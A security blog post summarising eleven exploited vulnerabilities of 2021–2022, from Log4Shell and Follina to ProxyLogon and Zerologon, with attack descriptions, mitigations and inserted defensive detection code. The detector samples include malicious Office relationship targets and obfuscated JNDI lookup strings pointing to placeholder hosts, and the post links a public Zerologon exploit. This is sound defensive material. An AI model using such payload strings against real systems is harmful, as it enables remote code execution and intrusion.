Top 11 exploited vulnerabilities for initial access and compromise in ‘22

Winter_Soldiers
Dec 3, 2022


“When one door closes, another one opens.” This holds true for security defenders and threat actors alike, especially with the myriad of vulnerabilities and exploits that exist in the wild. Over the past few years, threat actors have been changing their TTPs drastically, in line with the number of new vulnerabilities being discovered. But even with the influx of new ones, we can still observe quite a number of exploits from yesteryear being used in breaches today. This wide variety of vulnerabilities is exploited by threat actors to achieve results that range from privilege escalation and path traversal to security bypasses and remote code execution.

In this article, we discuss the top critical vulnerabilities that threat actors have exploited in the past few months to gain initial access and compromise, based on open-source research data. The vulnerabilities are listed in reverse chronological order of the dates on which they were published by NVD.

1. Google Chrome Vulnerability (CVE-2022-3723)

The high-severity flaw (CVE-2022-3723) is a type confusion bug in the Chrome V8 JavaScript engine, which was discovered and reported to Google by analysts at Avast.

Type: Remote code execution (RCE)
How the attack works: Type confusion in V8 in Google Chrome prior to 107.0.5304.87 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)
Impact: If the vulnerability is successfully exploited, the attacker achieves arbitrary code execution.
Affected product: Google Chrome versions prior to 107.0.5304.87/.88 for Windows and prior to 107.0.5304.87 for Mac and Linux
Mitigation: Update the Chrome browser to the latest version.

2. MSDT Follina Vulnerability (CVE-2022-30190)

This is a vulnerability in the Microsoft Support Diagnostic Tool (MSDT), which could be exploited to execute arbitrary code when MSDT is called using the URI protocol. The URI protocol ms-msdt:/ can be invoked from a malicious Word document or link, which, when opened by the victim user, allows malicious code to execute on the target machine with the privileges of the calling application. A Word document exploiting this vulnerability (CVE-2022-30190) was first submitted to VirusTotal on 27th May 2022 from Belarus with the file name 05-2022-0438.doc. The number 0438 turns out to be the area code of the region Follina in Italy, hence the name. The document was not found to be connected to Italy in any other way.

Type: Remote code execution (RCE)
How the attack works: Follina requires user interaction to achieve payload execution; this can be obtained by tricking a victim user into opening a malicious link or payload delivered via social media or email. When the document is opened, a malicious HTML script is rendered, leading to arbitrary code execution on the affected system.

Impact: An attacker who successfully exploits this vulnerability can run arbitrary code with the privileges of the calling application. The attacker can then install programs; view, change, or delete data; or create new accounts in the context allowed by the user’s rights.
Affected Product: Microsoft Support Diagnostic Tool (MSDT)
Mitigation: Patch the affected Windows OS to the latest version available.
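As an added defender-side illustration (this is example code written for this article, not anything from Microsoft or from the original post), the following Python triages a .docx for the kind of relationship a Follina-style document relies on: an external OLE object, or any target using the ms-msdt: scheme the section above describes. The sample package it builds is constructed inline; the host example.invalid and the target ms-msdt:/placeholder are placeholders, not real indicators.

```python
# Added example (not from the article): a small scanner that flags the kind of
# external relationship a Follina-style document uses to reach ms-msdt:/.
# Only the .rels parts are inspected; this is a triage check, not a full
# OOXML parser.
import io
import zipfile
import xml.etree.ElementTree as ET

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OFFICE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"


def scan_docx(data):
    """Return (part name, relationship id, target, reason) per suspicious relationship.

    Flags: any target using the ms-msdt: scheme, and any OLE object whose
    TargetMode is External (its content is fetched from outside the package).
    """
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as pkg:
        for name in pkg.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(pkg.read(name))
            for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
                target = rel.get("Target", "")
                external = rel.get("TargetMode", "").lower() == "external"
                rel_type = rel.get("Type", "")
                if target.lower().startswith("ms-msdt:"):
                    findings.append((name, rel.get("Id"), target, "ms-msdt URI"))
                elif external and rel_type == OFFICE_REL + "oleObject":
                    findings.append((name, rel.get("Id"), target, "external OLE object"))
    return findings


def build_sample_docx():
    """Constructed minimal package: one benign, one external OLE, one ms-msdt relationship."""
    rels = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        f'<Relationships xmlns="{RELS_NS}">'
        f'<Relationship Id="rId1" Type="{OFFICE_REL}styles" Target="styles.xml"/>'
        f'<Relationship Id="rId2" Type="{OFFICE_REL}oleObject" '
        'Target="http://example.invalid/stage.html" TargetMode="External"/>'
        f'<Relationship Id="rId3" Type="{OFFICE_REL}hyperlink" '
        'Target="ms-msdt:/placeholder" TargetMode="External"/>'
        '</Relationships>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as pkg:
        pkg.writestr("[Content_Types].xml", "<Types/>")
        pkg.writestr("word/document.xml", "<document/>")
        pkg.writestr("word/styles.xml", "<styles/>")
        pkg.writestr("word/_rels/document.xml.rels", rels)
    return buf.getvalue()


if __name__ == "__main__":
    for part, rid, target, reason in scan_docx(build_sample_docx()):
        print(f"{part}: {rid} -> {target} ({reason})")
```

Run against the constructed package, the scanner reports rId2 (external OLE object) and rId3 (ms-msdt URI) and ignores the ordinary styles relationship. In a mail gateway or sandbox pipeline the same check can run on every attachment before it reaches a user; a hit is a reason to quarantine, not proof of exploitation, since external OLE links also occur in legitimate documents.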

3. OpenSSL Vulnerability (CVE-2022-0778)

OpenSSL is a very popular library, widely used by organizations and software applications that require secure communications. The vulnerability lies in OpenSSL’s implementation of the Tonelli-Shanks algorithm, used to find modular square roots in the elliptic curve cryptography at the heart of the library.
Type: Denial of Service (DoS)
How the attack works: This vulnerability occurs when a composite number, instead of a prime, is passed to the Tonelli-Shanks algorithm. Computing a square root modulo a composite is then a hard computational problem, akin to integer factorization. The BN_mod_sqrt() function, which computes a modular square root, contains a bug that can cause it to loop forever for non-prime moduli. Internally this function is used when parsing certificates that contain elliptic curve public keys in compressed form or explicit elliptic curve parameters with a base point encoded in compressed form. It is possible to trigger the infinite loop by crafting a certificate that has invalid explicit curve parameters. Since certificate parsing happens prior to verification of the certificate signature, any process that parses an externally supplied certificate may thus be subject to a denial of service attack. The infinite loop can also be reached when parsing crafted private keys, as they can contain explicit elliptic curve parameters. Thus vulnerable situations include:
— TLS clients consuming server certificates
— TLS servers consuming client certificates
— Hosting providers taking certificates or private keys from customers
— Certificate authorities parsing certification requests from subscribers
— Anything else which parses ASN.1 elliptic curve parameters.
— Any other application that uses BN_mod_sqrt() where the attacker can control the parameter values is also vulnerable to this DoS issue.

In OpenSSL 1.0.2 the public key is not parsed during initial parsing of the certificate, which makes it slightly harder to trigger the infinite loop. However, any operation which requires the public key from the certificate will trigger the infinite loop. In particular, the attacker can use a self-signed certificate to trigger the loop during verification of the certificate signature.

Impact: CVE-2022-0778 lets specially crafted certificates cause a Denial of Service (DoS). The vulnerability affects both clients and servers.
Affected product: OpenSSL versions 1.0.2, 1.1.1 and 3.0. It was addressed in the releases of 1.1.1n and 3.0.2 on 15th March 2022. Fixed in OpenSSL 3.0.2 (affected 3.0.0, 3.0.1).
Mitigation: The issue is fixed in OpenSSL 1.1.1n (affected 1.1.1–1.1.1m) and in OpenSSL 1.0.2zd (affected 1.0.2–1.0.2zc). Update OpenSSL to the latest version.
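To make the failure mode concrete, here is an added Python example (written for this article; it is not OpenSSL’s code and does not reproduce its internals) of the Tonelli-Shanks square root with every loop bounded and the result verified at the end. The bounds are the property the vulnerable BN_mod_sqrt() lacked: with a prime modulus the algorithm converges within the bounds, and with a composite modulus such as 21, which is the situation a crafted certificate creates, the bounded version raises an error where an unbounded inner loop could spin forever. The numeric inputs are constructed for the demonstration.

```python
# Added example (not from the article, and not OpenSSL's code): a Tonelli-Shanks
# modular square root with every loop bounded, plus a final verification step.
# These bounds are what the vulnerable BN_mod_sqrt() lacked for non-prime moduli.

def mod_sqrt(a, p, max_nonresidue_tries=128):
    """Return x with x*x == a (mod p) for an odd prime p, or raise ValueError.

    The algorithm assumes p is prime. If a caller passes a composite modulus
    (as a crafted certificate could), the bounded loops and the final check
    turn a would-be hang into an error.
    """
    if p < 3 or p % 2 == 0:
        raise ValueError("modulus must be an odd number greater than 2")
    a %= p
    if a == 0:
        return 0
    # Euler's criterion: modulo a prime, a residue satisfies a^((p-1)/2) == 1.
    if pow(a, (p - 1) // 2, p) != 1:
        raise ValueError("not a quadratic residue")
    # Write p - 1 = q * 2^s with q odd.
    q, s = p - 1, 0
    while q % 2 == 0:
        q //= 2
        s += 1
    if s == 1:
        # p == 3 (mod 4): closed form, no search needed.
        x = pow(a, (p + 1) // 4, p)
    else:
        # Find a quadratic non-residue z. For a prime this succeeds quickly;
        # the bound keeps a composite modulus from turning the search into a hang.
        z = None
        for cand in range(2, min(p, 2 + max_nonresidue_tries)):
            if pow(cand, (p - 1) // 2, p) == p - 1:
                z = cand
                break
        if z is None:
            raise ValueError("no non-residue found; modulus is probably not prime")
        m, c = s, pow(z, q, p)
        t, x = pow(a, q, p), pow(a, (q + 1) // 2, p)
        # m strictly decreases each round, so at most s rounds are needed.
        for _ in range(s):
            if t == 1:
                break
            # Least i in (0, m) with t^(2^i) == 1. Unbounded, this is the loop
            # that could spin forever in the vulnerable OpenSSL versions.
            i, t2 = 0, t
            for i in range(1, m):
                t2 = t2 * t2 % p
                if t2 == 1:
                    break
            else:
                raise ValueError("loop did not converge; modulus is not prime")
            b = pow(c, 1 << (m - i - 1), p)
            m, c = i, b * b % p
            t, x = t * c % p, x * b % p
        if t != 1:
            raise ValueError("loop did not converge; modulus is not prime")
    # Never trust the result without verifying it.
    if x * x % p != a:
        raise ValueError("result does not verify; modulus is not prime")
    return x


def safe_mod_sqrt(a, p):
    """Wrapper returning None instead of raising, for callers that only need a verdict."""
    try:
        return mod_sqrt(a, p)
    except ValueError:
        return None


if __name__ == "__main__":
    # 41 is prime: 34*34 = 1156 = 28*41 + 8, so 34 is a square root of 8 mod 41.
    print(mod_sqrt(8, 41))
    # 21 is composite, and 8 passes Euler's criterion anyway (8^10 == 1 mod 21),
    # yet 8 has no square root mod 21; the bounded search reports that instead of hanging.
    print(safe_mod_sqrt(8, 21))
```

The instructive case is (8, 21): Euler’s criterion is satisfied, so a naive implementation proceeds into the search loops on an input that violates the primality assumption. Bounding each loop and verifying x*x == a before returning is the same defensive shape as the upstream fix; the general lesson for any parser of attacker-supplied cryptographic parameters is that every loop whose termination depends on a mathematical property of the input needs an explicit bound.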

4. Log4Shell (CVE-2021-44228)

This vulnerability affects Apache’s Log4j library, an open-source logging framework, and was disclosed as a zero-day vulnerability in December 2021. A successful Log4Shell exploitation can lead to remote code execution. Log4Shell is a Java Naming and Directory Interface (JNDI) injection vulnerability.

Type: Remote code execution (RCE)
How the attack works: The vulnerability can be exploited by submitting a specially crafted JNDI request (payload) to a vulnerable system that causes that system to execute arbitrary code. The request allows a threat actor to take full control of the system.

Impact: Apart from conducting RCE, attackers can steal information, launch ransomware, or conduct other malicious activity.
Affected Product: Apache Log4j is the affected product with over 400,000 downloads from its GitHub project. Log4j2 has been used across a variety of products and services, from Apache products like Struts, Solr, and Flink to security products like ElasticSearch, Logstash, Kafka, and even Minecraft servers.
Mitigation: Upgrade Log4j assets and affected products to the latest safe version, 2.17 or above.
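On the detection side, the “specially crafted JNDI request” described above leaves a recognisable lookup string in any field that reaches the logger. The following added Python example (written for this article, not from the Log4j project) scans web server log lines for such lookups. It first collapses the nested lower/upper and default-value lookups that Log4j resolves before the outer lookup, so that a plain substring match for “${jndi:” is not fooled; handling only those lookup types is an assumption of this example, not a reimplementation of Log4j. The log lines are constructed, using documentation IP space and the reserved .invalid TLD.

```python
# Added example (not from the article or from the Log4j project): flag Log4Shell
# style JNDI lookups in web server log lines, after collapsing the nested
# lookups that naive substring matching for "${jndi:" would miss.
import re

# Log4j 2 resolves inner lookups before the outer one, so ${${lower:J}ndi:...}
# reaches the JNDI lookup as ${jndi:...}. This example handles only the
# lower/upper lookups and the ${x:-default} fallback syntax (an assumption of
# this example; it is not a full reimplementation of Log4j's lookup engine).
_CASE = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
_DEFAULT = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalise(text, max_rounds=8):
    """Collapse nested lookups repeatedly, with a bound so hostile input cannot loop."""
    for _ in range(max_rounds):
        new = _CASE.sub(lambda m: m.group(2).lower() if m.group(1).lower() == "lower"
                        else m.group(2).upper(), text)
        new = _DEFAULT.sub(lambda m: m.group(1), new)
        if new == text:
            break
        text = new
    return text


def find_jndi_lookups(lines):
    """Return (line number, normalised lookup string) for every line with a JNDI lookup."""
    hits = []
    for n, line in enumerate(lines, 1):
        norm = normalise(line)
        m = _JNDI.search(norm)
        if not m:
            continue
        end = norm.find("}", m.start())
        hits.append((n, norm[m.start():end + 1] if end != -1 else norm[m.start():]))
    return hits


# Constructed sample log lines (Apache combined format). Line 4 carries a benign
# "${...}" string to show that only JNDI lookups are reported.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Dec/2021:12:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Dec/2021:12:00:02 +0000] "GET /login HTTP/1.1" 200 128 "-" "${jndi:ldap://lookup.invalid/a}"',
    '203.0.113.9 - - [10/Dec/2021:12:00:03 +0000] "GET /?q=${${lower:J}ndi:rmi://lookup.invalid/b} HTTP/1.1" 400 0 "-" "curl/7.79"',
    '203.0.113.11 - - [10/Dec/2021:12:00:04 +0000] "GET /docs HTTP/1.1" 200 2048 "-" "Price is ${price}"',
]

if __name__ == "__main__":
    for n, lookup in find_jndi_lookups(SAMPLE_LOG):
        print(f"line {n}: {lookup}")
```

Against the sample, lines 2 and 3 are reported and line 4 is not. The normalisation step matters more than the final regex: a detection that matches only the literal “${jndi:” misses the nested form on line 3, which the logger itself would happily resolve. A hit in an edge log is evidence of an attempt, not of success; confirming impact still requires checking whether a vulnerable Log4j version logged that field and whether the host made an outbound LDAP or RMI connection afterwards.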

5. PetitPotam (CVE-2021-36942)

The PetitPotam flaw is present in Windows servers where Active Directory Certificate Services (AD CS) is not configured with protection against NTLM relay attacks. An adversary can take control of a domain controller by forcing it to authenticate to an NTLM relay server under the adversary’s control, which then intercepts traffic and impersonates clients.

Type: Elevation of privilege
How the attack works: PetitPotam works by exploiting Microsoft’s Encrypting File System Remote Protocol (MS-EFSRPC) to trick one Windows host into authenticating to another over LSARPC on TCP port 445. Successful exploitation means that the target server will perform NTLM authentication to an arbitrary server, allowing a threat actor who is able to leverage the technique to deploy ransomware or create new policies.
According to Microsoft’s ADV210003 advisory, Windows users are potentially vulnerable to this attack if they are using Active Directory Certificate Services (AD CS) with any of the following services:
- Certificate Authority Web Enrollment
- Certificate Enrollment Web Service

Impact: The attacker uses Microsoft’s Encrypting File System Remote Protocol (MS-EFSRPC) to connect to a server, hijack the authentication session, and manipulate the results such that the server then believes the attacker has a legitimate right to access it. Using the authentication, the attacker can then drop tools such as a remote shell on the server and then leverage other exploits using that remote shell to elevate their own privileges.
Affected Product: Microsoft Active Directory Certificate Services (AD CS)
Mitigation: To prevent NTLM relay attacks on networks with NTLM enabled, domain administrators must ensure that services that permit NTLM authentication make use of protections such as Extended Protection for Authentication (EPA) or signing features such as SMB signing. Refer to KB5005413.

6. Windows Print Spooler vulnerability (CVE-2021-34527, CVE-2021-1675, CVE-2022-22718)

The Print Spooler remote code execution vulnerability takes advantage of the RpcAddPrinterDriver function call in the Print Spooler service that allows clients to add arbitrary DLL files as printer drivers and load them as SYSTEM (the spooler service context).

Type: Remote Code Execution
How the attack works: The RpcAddPrinterDriver function in the Print Spooler service is designed to allow users to update printers remotely. However, a logic flaw allows any user to inject their own unsigned DLL into the process, bypassing authentication and validation of the file.
Impact: Attackers exploiting the flaw can potentially create new user accounts, modify data and install programs. The vulnerability was dubbed PrintNightmare due to its potential of affecting millions of servers, computers, and laptops running Windows across the globe.
Affected Product: Microsoft Windows Print Spooler service
Mitigation: Patch all affected servers to the latest version.

7. ProxyShell (CVE-2021-34523, CVE-2021-34473, CVE-2021-31207)

These vulnerabilities lie in the Microsoft Client Access Service (CAS), which typically runs on port 443 in Microsoft Internet Information Services (IIS), Microsoft’s web server. CAS is commonly exposed to the internet to enable users to access their email via mobile devices and web browsers. This exposure has led to widespread exploitation by threat actors, who commonly deploy web shells to remotely execute arbitrary code on compromised devices.

Type: Elevation of privilege (CVE-2021-34523), RCE (CVE-2021-34473), Security feature bypass (CVE-2021-31207)
How the attack works: Attackers exploit ProxyShell to install a backdoor for later access and post-exploitation. ProxyShell comprises three separate vulnerabilities used as part of a single attack chain:

  • CVE-2021-34473 is a pre-auth path confusion vulnerability that bypasses access control.
  • CVE-2021-34523 is a privilege elevation vulnerability in the Exchange PowerShell backend.
  • CVE-2021-31207 is a post-auth remote code execution via arbitrary file write.

Impact: Successful exploitation of these vulnerabilities in combination enables a remote adversary to execute arbitrary code, establish persistence and take full control of vulnerable Microsoft Exchange email servers.
Affected Products: Exchange Server 2013, Exchange Server 2016, Exchange Server 2019
Mitigation: Update Exchange servers to the latest released patches. At a minimum, ensure that July 2021 updates are installed.
CVE-2021-34473 patched in KB5001779, released in April 2021
CVE-2021-34523 patched in KB5001779, released in April 2021
CVE-2021-31207 patched in KB5003435, released in May 2021

8. ProxyLogon (CVE-2021-26855, CVE-2021-26858, CVE-2021-26857, CVE-2021-27065)

The vulnerability was named ProxyLogon as it can be used to exploit the proxy architecture and login mechanism in Exchange Server. The ProxyLogon vulnerability is related to untrusted connections to the Exchange server on port 443 and can be exploited without user interaction. It allows attackers to bypass authentication and impersonate an administrator.

Type: Remote code execution (RCE)
How the attack works: Adversaries exploited ProxyLogon to drop web shells on vulnerable systems, where the MSExchange Mailbox Replication service was used to write an ASPX file to disk. CVE-2021-26855, also known as “ProxyLogon,” is a server-side request forgery flaw that can be chained with CVE-2021-27065, a post-authentication arbitrary file write bug, for an attacker to achieve remote code execution.
Impact: Successful exploitation of these vulnerabilities in combination allows an unauthenticated attacker to execute arbitrary code on vulnerable Exchange Servers. This enables the threat actor to gain persistent access to files, mailboxes and even credentials stored on the servers. Apart from persistence, it also opens the door for lateral movement and remote manipulation.
Affected Products:
Exchange Server 2019 < 15.02.0792.010
Exchange Server 2019 < 15.02.0721.013
Exchange Server 2016 < 15.01.2106.013
Exchange Server 2013 < 15.00.1497.012
Mitigation: Microsoft released out-of-band patches for Exchange Server 2013, 2016, and 2019, as well as a defense-in-depth update for Exchange Server 2010 because that version is only vulnerable to CVE-2021-26857.

9. Confluence Server Webwork OGNL injection (CVE-2021-26084)

An OGNL (Object-Graph Navigation Language) injection vulnerability allows an unauthenticated adversary to execute arbitrary code on a Confluence Server or Data Center instance.

Type: Arbitrary code execution
How the attack works: The vulnerability allows unauthenticated actors to execute arbitrary code on Confluence Server or Data Center installations.
An unauthenticated user without administrative privileges can remotely access the vulnerable endpoints on these applications if ‘Allow people to sign up to create their account’ is enabled. Check ‘COG > User Management > User Signup Options’ on the affected software to see if this is enabled.
Impact: Unauthenticated actors can execute arbitrary code on vulnerable systems. Threat actors target this vulnerability whose goal could be to download a malicious payload that would install a backdoor or miner in a user’s network.
Affected Product: Confluence server affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.
Mitigation: Patch Confluence servers to the latest version.

10. VMware vSphere Client vulnerability (CVE-2021-21972)

The vSphere Client (HTML5) contains a remote code execution vulnerability in a vCenter Server plugin. An adversary with network access to port 443 can exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server.

Type: Remote code execution (RCE)
How the attack works: Proof-of-concept code to exploit the vulnerability has been published online. These vulnerabilities allowed unauthorized clients to execute arbitrary commands and send requests on behalf of the targeted server via various protocols: an unauthorized file upload leading to remote code execution (CVE-2021-21972) and an unauthorized server-side request forgery (SSRF) vulnerability (CVE-2021-21973).

Impact: The attacker can gain remote code execution.
Affected Products:
VMware vCenter Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2).
Mitigation: Patch the affected servers. For more details, refer to this VMware report.

11. Zerologon (CVE-2020-1472)

Zerologon is a vulnerability in the cryptographic flow of Microsoft’s Netlogon process that allows an attack against Microsoft Active Directory domain controllers. The initialization vector (IV) is always set to all zeros, while an IV should always be a random value. Taking advantage of this vulnerability, a threat actor can connect with the Active Directory Netlogon Remote Protocol (MS-NRPC) and log on using NTLM.

Type: Elevation of privilege
How the attack works: There are scripts available that can be used to exploit this vulnerability. https://github.com/dirkjanm/CVE-2020-1472 by @dirkjan includes an actual exploit to change (and revert) the domain controller password.

Impact: Zerologon allows attackers to impersonate any computer, including the root domain controller.
Affected Product: Microsoft Netlogon Remote Protocol (MS-NRPC) on AD servers
Mitigation: Patch all AD servers (2008 R2 and above).

General steps for mitigations

  1. Update software, operating systems, applications, and firmware on IT network assets in a timely manner. Prioritize patching known exploited vulnerabilities.
  2. Use a centralized patch management system.
  3. Replace end-of-life software, i.e., software that is no longer supported by the vendor.
  4. Enforce multifactor authentication (MFA) for all users, without exception.
  5. Enforce MFA on all VPN connections. If MFA is unavailable, require employees engaging in remote work to use strong passwords.
  6. Regularly review, validate, or remove privileged accounts (annually at a minimum).
  7. Configure access control according to the principle of least privilege.
  8. Properly configure and secure internet-facing network devices, disable unused or unnecessary network ports and protocols, encrypt network traffic, and disable unused network services and devices. Implement proper hardening measures.
  9. Segment networks to limit or block lateral movement by controlling access to applications, devices, and databases. Use private virtual local area networks.
  10. Continuously monitor the attack surface and investigate abnormal activity that may indicate lateral movement of a threat actor or malware.
  11. Reduce third-party applications and unique system/application builds; provide exceptions only if required to support business-critical functions. Implement application allow listing.

Disclaimer
The information in this article is based on research data from various open-source forums (which are listed in the references section).

Reference sources:

https://news.sophos.com/en-us
https://cve.mitre.org/
https://nvd.nist.gov/vuln/detail/
https://www.cisa.gov/uscert/ncas/alerts/aa22-117a
https://www.crowdstrike.com/blog/cve-2020-1472-zerologon-security-advisory/
https://resources.infosecinstitute.com/topic/most-dangerous-vulnerabilities-exploited/
https://www.semperis.com/blog/what-you-need-to-know-about-printnightmare-the-critical-windows-print-spooler-vulnerability/
https://www.sentinelone.com/blog/enterprise-security-essentials-top-15-most-routinely-exploited-vulnerabilities-2022/
https://www.trellix.com/en-us/about/newsroom/stories/research/countering-follina-attack-with-network-security-platforms-advanced-detection-features.html
